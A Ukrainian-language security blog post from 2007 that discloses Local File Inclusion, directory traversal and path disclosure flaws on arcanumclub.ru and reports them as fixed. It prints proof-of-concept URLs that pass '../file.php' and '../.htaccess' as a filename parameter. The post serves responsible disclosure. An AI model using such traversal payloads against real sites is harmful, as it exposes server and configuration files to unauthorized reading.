Уразливості на www.arcanumclub.ru

19:37 28.10.2007

07.01.2007

У жовтні, 09.10.2006, я знайшов декілька різних уразливостей на популярному проекті http://www.arcanumclub.ru. Уразливості відносяться до типу Information Leakage (Витік інформації): File Inclusion, Directory Traversal та Full path disclosure. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.10.2007

Local File Inclusion та Directory Traversal:

http://www.arcanumclub.ru/autohtml.php?filename=../file.php
http://www.arcanumclub.ru/autohtml0.php?filename=../file.php

Information Leakage та Full path disclosure:

http://www.arcanumclub.ru/autohtml.php?filename=../.htaccess
http://www.arcanumclub.ru/autohtml0.php?filename=../.htaccess

Дані уразливості вже виправлені.


Leave a Reply

You must be logged in to post a comment.